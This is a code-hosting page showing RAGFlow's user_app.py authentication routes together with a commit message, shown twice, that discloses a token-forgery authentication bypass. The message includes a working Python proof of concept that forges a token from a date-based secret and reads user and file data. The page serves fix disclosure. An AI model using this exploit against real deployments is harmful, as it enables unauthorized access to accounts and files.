You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

user_app.py 24KB

Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis **Source (User Input):** HTTP Authorization header containing attacker-controlled JWT token **Flow Path:** 1. **Entry Point:** `load_user()` function in `api/apps/__init__.py` (Line 142) 2. **Token Processing:** JWT token extracted from Authorization header 3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. **Database Query:** `UserService.query()` called with decoded empty access_token 5. **Sink:** Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` **Exploitation Steps:** 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials **Version:** 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>
5 months ago
Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis **Source (User Input):** HTTP Authorization header containing attacker-controlled JWT token **Flow Path:** 1. **Entry Point:** `load_user()` function in `api/apps/__init__.py` (Line 142) 2. **Token Processing:** JWT token extracted from Authorization header 3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. **Database Query:** `UserService.query()` called with decoded empty access_token 5. **Sink:** Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` **Exploitation Steps:** 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials **Version:** 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>
5 months ago
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624625626627628629630631632633634635636637638639640641642643644645646647648649650651652653654655656657658659660661662663664665666667668669670671672673674675676677678679680681682683684685686687688689690691692693694695696697698699700701702703704705706707708709710711712713714715716717718719720721722723724725726727728729730731732733734735736737738739740741742743744745746747748749750751752753754755756757758759760761762763764765766767768769770771772773774775776777778779780781782783784785786787788789790791792793794795796797798799800801802803804805806807808809810811812813
  1. #
  2. # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
  3. #
  4. # Licensed under the Apache License, Version 2.0 (the "License");
  5. # you may not use this file except in compliance with the License.
  6. # You may obtain a copy of the License at
  7. #
  8. # http://www.apache.org/licenses/LICENSE-2.0
  9. #
  10. # Unless required by applicable law or agreed to in writing, software
  11. # distributed under the License is distributed on an "AS IS" BASIS,
  12. # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  13. # See the License for the specific language governing permissions and
  14. # limitations under the License.
  15. #
  16. import json
  17. import logging
  18. import re
  19. import secrets
  20. from datetime import datetime
  21. from flask import redirect, request, session
  22. from flask_login import current_user, login_required, login_user, logout_user
  23. from werkzeug.security import check_password_hash, generate_password_hash
  24. from api import settings
  25. from api.apps.auth import get_auth_client
  26. from api.db import FileType, UserTenantRole
  27. from api.db.db_models import TenantLLM
  28. from api.db.services.file_service import FileService
  29. from api.db.services.llm_service import get_init_tenant_llm
  30. from api.db.services.tenant_llm_service import TenantLLMService
  31. from api.db.services.user_service import TenantService, UserService, UserTenantService
  32. from api.utils import (
  33. current_timestamp,
  34. datetime_format,
  35. decrypt,
  36. download_img,
  37. get_format_time,
  38. get_uuid,
  39. )
  40. from api.utils.api_utils import (
  41. construct_response,
  42. get_data_error_result,
  43. get_json_result,
  44. server_error_response,
  45. validate_request,
  46. )
  47. @manager.route("/login", methods=["POST", "GET"]) # noqa: F821
  48. def login():
  49. """
  50. User login endpoint.
  51. ---
  52. tags:
  53. - User
  54. parameters:
  55. - in: body
  56. name: body
  57. description: Login credentials.
  58. required: true
  59. schema:
  60. type: object
  61. properties:
  62. email:
  63. type: string
  64. description: User email.
  65. password:
  66. type: string
  67. description: User password.
  68. responses:
  69. 200:
  70. description: Login successful.
  71. schema:
  72. type: object
  73. 401:
  74. description: Authentication failed.
  75. schema:
  76. type: object
  77. """
  78. if not request.json:
  79. return get_json_result(data=False, code=settings.RetCode.AUTHENTICATION_ERROR, message="Unauthorized!")
  80. email = request.json.get("email", "")
  81. users = UserService.query(email=email)
  82. if not users:
  83. return get_json_result(
  84. data=False,
  85. code=settings.RetCode.AUTHENTICATION_ERROR,
  86. message=f"Email: {email} is not registered!",
  87. )
  88. password = request.json.get("password")
  89. try:
  90. password = decrypt(password)
  91. except BaseException:
  92. return get_json_result(data=False, code=settings.RetCode.SERVER_ERROR, message="Fail to crypt password")
  93. user = UserService.query_user(email, password)
  94. if user:
  95. response_data = user.to_json()
  96. user.access_token = get_uuid()
  97. login_user(user)
  98. user.update_time = (current_timestamp(),)
  99. user.update_date = (datetime_format(datetime.now()),)
  100. user.save()
  101. msg = "Welcome back!"
  102. return construct_response(data=response_data, auth=user.get_id(), message=msg)
  103. else:
  104. return get_json_result(
  105. data=False,
  106. code=settings.RetCode.AUTHENTICATION_ERROR,
  107. message="Email and password do not match!",
  108. )
  109. @manager.route("/login/channels", methods=["GET"]) # noqa: F821
  110. def get_login_channels():
  111. """
  112. Get all supported authentication channels.
  113. """
  114. try:
  115. channels = []
  116. for channel, config in settings.OAUTH_CONFIG.items():
  117. channels.append(
  118. {
  119. "channel": channel,
  120. "display_name": config.get("display_name", channel.title()),
  121. "icon": config.get("icon", "sso"),
  122. }
  123. )
  124. return get_json_result(data=channels)
  125. except Exception as e:
  126. logging.exception(e)
  127. return get_json_result(data=[], message=f"Load channels failure, error: {str(e)}", code=settings.RetCode.EXCEPTION_ERROR)
  128. @manager.route("/login/<channel>", methods=["GET"]) # noqa: F821
  129. def oauth_login(channel):
  130. channel_config = settings.OAUTH_CONFIG.get(channel)
  131. if not channel_config:
  132. raise ValueError(f"Invalid channel name: {channel}")
  133. auth_cli = get_auth_client(channel_config)
  134. state = get_uuid()
  135. session["oauth_state"] = state
  136. auth_url = auth_cli.get_authorization_url(state)
  137. return redirect(auth_url)
  138. @manager.route("/oauth/callback/<channel>", methods=["GET"]) # noqa: F821
  139. def oauth_callback(channel):
  140. """
  141. Handle the OAuth/OIDC callback for various channels dynamically.
  142. """
  143. try:
  144. channel_config = settings.OAUTH_CONFIG.get(channel)
  145. if not channel_config:
  146. raise ValueError(f"Invalid channel name: {channel}")
  147. auth_cli = get_auth_client(channel_config)
  148. # Check the state
  149. state = request.args.get("state")
  150. if not state or state != session.get("oauth_state"):
  151. return redirect("/?error=invalid_state")
  152. session.pop("oauth_state", None)
  153. # Obtain the authorization code
  154. code = request.args.get("code")
  155. if not code:
  156. return redirect("/?error=missing_code")
  157. # Exchange authorization code for access token
  158. token_info = auth_cli.exchange_code_for_token(code)
  159. access_token = token_info.get("access_token")
  160. if not access_token:
  161. return redirect("/?error=token_failed")
  162. id_token = token_info.get("id_token")
  163. # Fetch user info
  164. user_info = auth_cli.fetch_user_info(access_token, id_token=id_token)
  165. if not user_info.email:
  166. return redirect("/?error=email_missing")
  167. # Login or register
  168. users = UserService.query(email=user_info.email)
  169. user_id = get_uuid()
  170. if not users:
  171. try:
  172. try:
  173. avatar = download_img(user_info.avatar_url)
  174. except Exception as e:
  175. logging.exception(e)
  176. avatar = ""
  177. users = user_register(
  178. user_id,
  179. {
  180. "access_token": get_uuid(),
  181. "email": user_info.email,
  182. "avatar": avatar,
  183. "nickname": user_info.nickname,
  184. "login_channel": channel,
  185. "last_login_time": get_format_time(),
  186. "is_superuser": False,
  187. },
  188. )
  189. if not users:
  190. raise Exception(f"Failed to register {user_info.email}")
  191. if len(users) > 1:
  192. raise Exception(f"Same email: {user_info.email} exists!")
  193. # Try to log in
  194. user = users[0]
  195. login_user(user)
  196. return redirect(f"/?auth={user.get_id()}")
  197. except Exception as e:
  198. rollback_user_registration(user_id)
  199. logging.exception(e)
  200. return redirect(f"/?error={str(e)}")
  201. # User exists, try to log in
  202. user = users[0]
  203. user.access_token = get_uuid()
  204. login_user(user)
  205. user.save()
  206. return redirect(f"/?auth={user.get_id()}")
  207. except Exception as e:
  208. logging.exception(e)
  209. return redirect(f"/?error={str(e)}")
  210. @manager.route("/github_callback", methods=["GET"]) # noqa: F821
  211. def github_callback():
  212. """
  213. **Deprecated**, Use `/oauth/callback/<channel>` instead.
  214. GitHub OAuth callback endpoint.
  215. ---
  216. tags:
  217. - OAuth
  218. parameters:
  219. - in: query
  220. name: code
  221. type: string
  222. required: true
  223. description: Authorization code from GitHub.
  224. responses:
  225. 200:
  226. description: Authentication successful.
  227. schema:
  228. type: object
  229. """
  230. import requests
  231. res = requests.post(
  232. settings.GITHUB_OAUTH.get("url"),
  233. data={
  234. "client_id": settings.GITHUB_OAUTH.get("client_id"),
  235. "client_secret": settings.GITHUB_OAUTH.get("secret_key"),
  236. "code": request.args.get("code"),
  237. },
  238. headers={"Accept": "application/json"},
  239. )
  240. res = res.json()
  241. if "error" in res:
  242. return redirect("/?error=%s" % res["error_description"])
  243. if "user:email" not in res["scope"].split(","):
  244. return redirect("/?error=user:email not in scope")
  245. session["access_token"] = res["access_token"]
  246. session["access_token_from"] = "github"
  247. user_info = user_info_from_github(session["access_token"])
  248. email_address = user_info["email"]
  249. users = UserService.query(email=email_address)
  250. user_id = get_uuid()
  251. if not users:
  252. # User isn't try to register
  253. try:
  254. try:
  255. avatar = download_img(user_info["avatar_url"])
  256. except Exception as e:
  257. logging.exception(e)
  258. avatar = ""
  259. users = user_register(
  260. user_id,
  261. {
  262. "access_token": session["access_token"],
  263. "email": email_address,
  264. "avatar": avatar,
  265. "nickname": user_info["login"],
  266. "login_channel": "github",
  267. "last_login_time": get_format_time(),
  268. "is_superuser": False,
  269. },
  270. )
  271. if not users:
  272. raise Exception(f"Fail to register {email_address}.")
  273. if len(users) > 1:
  274. raise Exception(f"Same email: {email_address} exists!")
  275. # Try to log in
  276. user = users[0]
  277. login_user(user)
  278. return redirect("/?auth=%s" % user.get_id())
  279. except Exception as e:
  280. rollback_user_registration(user_id)
  281. logging.exception(e)
  282. return redirect("/?error=%s" % str(e))
  283. # User has already registered, try to log in
  284. user = users[0]
  285. user.access_token = get_uuid()
  286. login_user(user)
  287. user.save()
  288. return redirect("/?auth=%s" % user.get_id())
  289. @manager.route("/feishu_callback", methods=["GET"]) # noqa: F821
  290. def feishu_callback():
  291. """
  292. Feishu OAuth callback endpoint.
  293. ---
  294. tags:
  295. - OAuth
  296. parameters:
  297. - in: query
  298. name: code
  299. type: string
  300. required: true
  301. description: Authorization code from Feishu.
  302. responses:
  303. 200:
  304. description: Authentication successful.
  305. schema:
  306. type: object
  307. """
  308. import requests
  309. app_access_token_res = requests.post(
  310. settings.FEISHU_OAUTH.get("app_access_token_url"),
  311. data=json.dumps(
  312. {
  313. "app_id": settings.FEISHU_OAUTH.get("app_id"),
  314. "app_secret": settings.FEISHU_OAUTH.get("app_secret"),
  315. }
  316. ),
  317. headers={"Content-Type": "application/json; charset=utf-8"},
  318. )
  319. app_access_token_res = app_access_token_res.json()
  320. if app_access_token_res["code"] != 0:
  321. return redirect("/?error=%s" % app_access_token_res)
  322. res = requests.post(
  323. settings.FEISHU_OAUTH.get("user_access_token_url"),
  324. data=json.dumps(
  325. {
  326. "grant_type": settings.FEISHU_OAUTH.get("grant_type"),
  327. "code": request.args.get("code"),
  328. }
  329. ),
  330. headers={
  331. "Content-Type": "application/json; charset=utf-8",
  332. "Authorization": f"Bearer {app_access_token_res['app_access_token']}",
  333. },
  334. )
  335. res = res.json()
  336. if res["code"] != 0:
  337. return redirect("/?error=%s" % res["message"])
  338. if "contact:user.email:readonly" not in res["data"]["scope"].split():
  339. return redirect("/?error=contact:user.email:readonly not in scope")
  340. session["access_token"] = res["data"]["access_token"]
  341. session["access_token_from"] = "feishu"
  342. user_info = user_info_from_feishu(session["access_token"])
  343. email_address = user_info["email"]
  344. users = UserService.query(email=email_address)
  345. user_id = get_uuid()
  346. if not users:
  347. # User isn't try to register
  348. try:
  349. try:
  350. avatar = download_img(user_info["avatar_url"])
  351. except Exception as e:
  352. logging.exception(e)
  353. avatar = ""
  354. users = user_register(
  355. user_id,
  356. {
  357. "access_token": session["access_token"],
  358. "email": email_address,
  359. "avatar": avatar,
  360. "nickname": user_info["en_name"],
  361. "login_channel": "feishu",
  362. "last_login_time": get_format_time(),
  363. "is_superuser": False,
  364. },
  365. )
  366. if not users:
  367. raise Exception(f"Fail to register {email_address}.")
  368. if len(users) > 1:
  369. raise Exception(f"Same email: {email_address} exists!")
  370. # Try to log in
  371. user = users[0]
  372. login_user(user)
  373. return redirect("/?auth=%s" % user.get_id())
  374. except Exception as e:
  375. rollback_user_registration(user_id)
  376. logging.exception(e)
  377. return redirect("/?error=%s" % str(e))
  378. # User has already registered, try to log in
  379. user = users[0]
  380. user.access_token = get_uuid()
  381. login_user(user)
  382. user.save()
  383. return redirect("/?auth=%s" % user.get_id())
  384. def user_info_from_feishu(access_token):
  385. import requests
  386. headers = {
  387. "Content-Type": "application/json; charset=utf-8",
  388. "Authorization": f"Bearer {access_token}",
  389. }
  390. res = requests.get("https://open.feishu.cn/open-apis/authen/v1/user_info", headers=headers)
  391. user_info = res.json()["data"]
  392. user_info["email"] = None if user_info.get("email") == "" else user_info["email"]
  393. return user_info
  394. def user_info_from_github(access_token):
  395. import requests
  396. headers = {"Accept": "application/json", "Authorization": f"token {access_token}"}
  397. res = requests.get(f"https://api.github.com/user?access_token={access_token}", headers=headers)
  398. user_info = res.json()
  399. email_info = requests.get(
  400. f"https://api.github.com/user/emails?access_token={access_token}",
  401. headers=headers,
  402. ).json()
  403. user_info["email"] = next((email for email in email_info if email["primary"]), None)["email"]
  404. return user_info
  405. @manager.route("/logout", methods=["GET"]) # noqa: F821
  406. @login_required
  407. def log_out():
  408. """
  409. User logout endpoint.
  410. ---
  411. tags:
  412. - User
  413. security:
  414. - ApiKeyAuth: []
  415. responses:
  416. 200:
  417. description: Logout successful.
  418. schema:
  419. type: object
  420. """
  421. current_user.access_token = f"INVALID_{secrets.token_hex(16)}"
  422. current_user.save()
  423. logout_user()
  424. return get_json_result(data=True)
  425. @manager.route("/setting", methods=["POST"]) # noqa: F821
  426. @login_required
  427. def setting_user():
  428. """
  429. Update user settings.
  430. ---
  431. tags:
  432. - User
  433. security:
  434. - ApiKeyAuth: []
  435. parameters:
  436. - in: body
  437. name: body
  438. description: User settings to update.
  439. required: true
  440. schema:
  441. type: object
  442. properties:
  443. nickname:
  444. type: string
  445. description: New nickname.
  446. email:
  447. type: string
  448. description: New email.
  449. responses:
  450. 200:
  451. description: Settings updated successfully.
  452. schema:
  453. type: object
  454. """
  455. update_dict = {}
  456. request_data = request.json
  457. if request_data.get("password"):
  458. new_password = request_data.get("new_password")
  459. if not check_password_hash(current_user.password, decrypt(request_data["password"])):
  460. return get_json_result(
  461. data=False,
  462. code=settings.RetCode.AUTHENTICATION_ERROR,
  463. message="Password error!",
  464. )
  465. if new_password:
  466. update_dict["password"] = generate_password_hash(decrypt(new_password))
  467. for k in request_data.keys():
  468. if k in [
  469. "password",
  470. "new_password",
  471. "email",
  472. "status",
  473. "is_superuser",
  474. "login_channel",
  475. "is_anonymous",
  476. "is_active",
  477. "is_authenticated",
  478. "last_login_time",
  479. ]:
  480. continue
  481. update_dict[k] = request_data[k]
  482. try:
  483. UserService.update_by_id(current_user.id, update_dict)
  484. return get_json_result(data=True)
  485. except Exception as e:
  486. logging.exception(e)
  487. return get_json_result(data=False, message="Update failure!", code=settings.RetCode.EXCEPTION_ERROR)
  488. @manager.route("/info", methods=["GET"]) # noqa: F821
  489. @login_required
  490. def user_profile():
  491. """
  492. Get user profile information.
  493. ---
  494. tags:
  495. - User
  496. security:
  497. - ApiKeyAuth: []
  498. responses:
  499. 200:
  500. description: User profile retrieved successfully.
  501. schema:
  502. type: object
  503. properties:
  504. id:
  505. type: string
  506. description: User ID.
  507. nickname:
  508. type: string
  509. description: User nickname.
  510. email:
  511. type: string
  512. description: User email.
  513. """
  514. return get_json_result(data=current_user.to_dict())
  515. def rollback_user_registration(user_id):
  516. try:
  517. UserService.delete_by_id(user_id)
  518. except Exception:
  519. pass
  520. try:
  521. TenantService.delete_by_id(user_id)
  522. except Exception:
  523. pass
  524. try:
  525. u = UserTenantService.query(tenant_id=user_id)
  526. if u:
  527. UserTenantService.delete_by_id(u[0].id)
  528. except Exception:
  529. pass
  530. try:
  531. TenantLLM.delete().where(TenantLLM.tenant_id == user_id).execute()
  532. except Exception:
  533. pass
  534. def user_register(user_id, user):
  535. user["id"] = user_id
  536. tenant = {
  537. "id": user_id,
  538. "name": user["nickname"] + "‘s Kingdom",
  539. "llm_id": settings.CHAT_MDL,
  540. "embd_id": settings.EMBEDDING_MDL,
  541. "asr_id": settings.ASR_MDL,
  542. "parser_ids": settings.PARSERS,
  543. "img2txt_id": settings.IMAGE2TEXT_MDL,
  544. "rerank_id": settings.RERANK_MDL,
  545. }
  546. usr_tenant = {
  547. "tenant_id": user_id,
  548. "user_id": user_id,
  549. "invited_by": user_id,
  550. "role": UserTenantRole.OWNER,
  551. }
  552. file_id = get_uuid()
  553. file = {
  554. "id": file_id,
  555. "parent_id": file_id,
  556. "tenant_id": user_id,
  557. "created_by": user_id,
  558. "name": "/",
  559. "type": FileType.FOLDER.value,
  560. "size": 0,
  561. "location": "",
  562. }
  563. tenant_llm = get_init_tenant_llm(user_id)
  564. if not UserService.save(**user):
  565. return
  566. TenantService.insert(**tenant)
  567. UserTenantService.insert(**usr_tenant)
  568. TenantLLMService.insert_many(tenant_llm)
  569. FileService.insert(file)
  570. return UserService.query(email=user["email"])
  571. @manager.route("/register", methods=["POST"]) # noqa: F821
  572. @validate_request("nickname", "email", "password")
  573. def user_add():
  574. """
  575. Register a new user.
  576. ---
  577. tags:
  578. - User
  579. parameters:
  580. - in: body
  581. name: body
  582. description: Registration details.
  583. required: true
  584. schema:
  585. type: object
  586. properties:
  587. nickname:
  588. type: string
  589. description: User nickname.
  590. email:
  591. type: string
  592. description: User email.
  593. password:
  594. type: string
  595. description: User password.
  596. responses:
  597. 200:
  598. description: Registration successful.
  599. schema:
  600. type: object
  601. """
  602. if not settings.REGISTER_ENABLED:
  603. return get_json_result(
  604. data=False,
  605. message="User registration is disabled!",
  606. code=settings.RetCode.OPERATING_ERROR,
  607. )
  608. req = request.json
  609. email_address = req["email"]
  610. # Validate the email address
  611. if not re.match(r"^[\w\._-]+@([\w_-]+\.)+[\w-]{2,}$", email_address):
  612. return get_json_result(
  613. data=False,
  614. message=f"Invalid email address: {email_address}!",
  615. code=settings.RetCode.OPERATING_ERROR,
  616. )
  617. # Check if the email address is already used
  618. if UserService.query(email=email_address):
  619. return get_json_result(
  620. data=False,
  621. message=f"Email: {email_address} has already registered!",
  622. code=settings.RetCode.OPERATING_ERROR,
  623. )
  624. # Construct user info data
  625. nickname = req["nickname"]
  626. user_dict = {
  627. "access_token": get_uuid(),
  628. "email": email_address,
  629. "nickname": nickname,
  630. "password": decrypt(req["password"]),
  631. "login_channel": "password",
  632. "last_login_time": get_format_time(),
  633. "is_superuser": False,
  634. }
  635. user_id = get_uuid()
  636. try:
  637. users = user_register(user_id, user_dict)
  638. if not users:
  639. raise Exception(f"Fail to register {email_address}.")
  640. if len(users) > 1:
  641. raise Exception(f"Same email: {email_address} exists!")
  642. user = users[0]
  643. login_user(user)
  644. return construct_response(
  645. data=user.to_json(),
  646. auth=user.get_id(),
  647. message=f"{nickname}, welcome aboard!",
  648. )
  649. except Exception as e:
  650. rollback_user_registration(user_id)
  651. logging.exception(e)
  652. return get_json_result(
  653. data=False,
  654. message=f"User registration failure, error: {str(e)}",
  655. code=settings.RetCode.EXCEPTION_ERROR,
  656. )
  657. @manager.route("/tenant_info", methods=["GET"]) # noqa: F821
  658. @login_required
  659. def tenant_info():
  660. """
  661. Get tenant information.
  662. ---
  663. tags:
  664. - Tenant
  665. security:
  666. - ApiKeyAuth: []
  667. responses:
  668. 200:
  669. description: Tenant information retrieved successfully.
  670. schema:
  671. type: object
  672. properties:
  673. tenant_id:
  674. type: string
  675. description: Tenant ID.
  676. name:
  677. type: string
  678. description: Tenant name.
  679. llm_id:
  680. type: string
  681. description: LLM ID.
  682. embd_id:
  683. type: string
  684. description: Embedding model ID.
  685. """
  686. try:
  687. tenants = TenantService.get_info_by(current_user.id)
  688. if not tenants:
  689. return get_data_error_result(message="Tenant not found!")
  690. return get_json_result(data=tenants[0])
  691. except Exception as e:
  692. return server_error_response(e)
  693. @manager.route("/set_tenant_info", methods=["POST"]) # noqa: F821
  694. @login_required
  695. @validate_request("tenant_id", "asr_id", "embd_id", "img2txt_id", "llm_id")
  696. def set_tenant_info():
  697. """
  698. Update tenant information.
  699. ---
  700. tags:
  701. - Tenant
  702. security:
  703. - ApiKeyAuth: []
  704. parameters:
  705. - in: body
  706. name: body
  707. description: Tenant information to update.
  708. required: true
  709. schema:
  710. type: object
  711. properties:
  712. tenant_id:
  713. type: string
  714. description: Tenant ID.
  715. llm_id:
  716. type: string
  717. description: LLM ID.
  718. embd_id:
  719. type: string
  720. description: Embedding model ID.
  721. asr_id:
  722. type: string
  723. description: ASR model ID.
  724. img2txt_id:
  725. type: string
  726. description: Image to Text model ID.
  727. responses:
  728. 200:
  729. description: Tenant information updated successfully.
  730. schema:
  731. type: object
  732. """
  733. req = request.json
  734. try:
  735. tid = req.pop("tenant_id")
  736. TenantService.update_by_id(tid, req)
  737. return get_json_result(data=True)
  738. except Exception as e:
  739. return server_error_response(e)